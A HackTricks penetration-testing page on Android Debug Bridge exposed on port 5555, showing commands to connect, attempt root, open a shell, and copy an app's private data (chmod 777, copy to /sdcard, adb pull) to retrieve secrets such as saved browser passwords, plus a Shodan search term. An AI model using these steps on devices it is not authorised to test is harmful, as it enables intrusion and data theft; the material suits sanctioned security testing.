3.9 KiB
5555 - Android Debug Bridge
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
From the docs:
Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.
Default port: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Connect
If find the ADB service running in a port of a device and you can connect to it, you can get a shell inside the system:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
For more ADB commands check the following page:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Dump App data
In order to completely download the data of an application you can:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
You can use this trick to retrieve sensitive information like chrome passwords. For more info about this check the information a references provided here.
Shodan
android debug bridge
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.